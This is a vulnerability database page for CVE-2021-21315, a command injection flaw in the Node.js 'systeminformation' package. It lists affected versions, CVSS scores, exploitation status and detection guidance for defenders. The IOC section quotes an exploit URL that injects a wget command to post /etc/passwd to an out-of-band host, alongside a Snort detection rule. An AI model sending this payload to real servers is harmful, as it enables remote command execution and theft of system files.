cbcvebase.
CVE-2021-21315
published 2021-02-16

CVE-2021-21315: The System Information Library for Node.JS (npm package "systeminformation") is an open source collection of functions to retrieve detailed hardware, system…

PriorityP187high7.8CVSS 3.1
AVLACLPRLUINSUCHIHAH
KEVITWEXPLOITInitial access
CISA Known Exploited Vulnerabilitydue 2022-02-01
Exploited in the wild
EPSS
90.24%
99.8th percentile
The System Information Library for Node.JS (npm package "systeminformation") is an open source collection of functions to retrieve detailed hardware, system and OS information. In systeminformation before version 5.3.1 there is a command injection vulnerability. Problem was fixed in version 5.3.1. As a workaround instead of upgrading, be sure to check or sanitize service parameters that are passed to si.inetLatency(), si.inetChecksite(), si.services(), si.processLoad() ... do only allow strings, reject any arrays. String sanitation works as expected.

Affected

5 ranges
VendorProductVersion rangeFixed in
apachecordova
paloaltopan-os
sebhildebrandtsysteminformation< 5.3.15.3.1
systeminformationsysteminformation< 5.3.15.3.1
systeminformationsysteminformation>= 0 < 5.3.15.3.1

Detection & IOCsextracted from sources · hover to see the quote

url/api/getServices?name[]=$(wget%20--post-file%20/etc/passwd%20{{interactsh-url}})
path/api/getServices
snort
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT NodeJS System Information Library Command Injection Attempt (CVE-2021-21315)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/api/getServices?name"; fast_pattern; pcre:"/^(?:\x28|\x29|\x3c|\x3e|\x26|\x2a|\xe2|\x80|\x98|\x7c|\x3f|\x3b|\x5b|\x5d|\x5e|\x7e|\x21|\x2e|\xe2|\x80|\x9d|\x25|\x40|\x2f|\x5c|\x3a|\x2b|\x2c|\x60)/R"; content:"|3d|"; within:10; reference:cve,2021-21315; classtype:attempted-admin; sid:2034973; rev:3; metadata:attack_target Server, created_at 2022_01_25, cve CVE_2021_21315, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Exploit, tag CISA_KEV, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_03_08, mitre_tactic_id TA0008, mitre_tactic_name Lateral_Movement, mitre_technique_id T1210, mitre_technique_name Exploitation_Of_Remote_Services;)
  • Exploit requests use HTTP GET to /api/getServices with the 'name' parameter supplied as an array (e.g., name[]=...) containing shell metacharacters or subshell syntax such as $(...)
  • Response body of a successful exploitation attempt will contain the literal injected command string alongside JSON keys 'name', 'running', and 'pids'
  • Successful exploit responses return HTTP 200 with Content-Type: application/json
  • The Emerging Threats Snort rule (SID 2034973) triggers on GET requests to /api/getServices?name where the value begins with shell-special characters (parentheses, angle brackets, pipe, semicolon, brackets, etc.) followed by an '=' sign (hex 3d) within 10 bytes
  • Vulnerable functions that accept unsanitized parameters include si.inetLatency(), si.inetChecksite(), si.services(), and si.processLoad(); passing arrays instead of strings triggers injection
  • ·The vulnerability is only exploitable in systeminformation versions prior to 5.3.1; version 5.3.1 and later are patched
  • ·Array-type inputs to the vulnerable functions are the trigger; string inputs with proper sanitization are safe, so detection logic should focus on array-style query parameters (e.g., name[])

CVSS provenance

nvdv3.17.8HIGHCVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvdv2.04.6MEDIUMAV:L/AC:L/Au:N/C:P/I:P/A:P
vulncheck7.1HIGH
cisa7.8HIGH
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.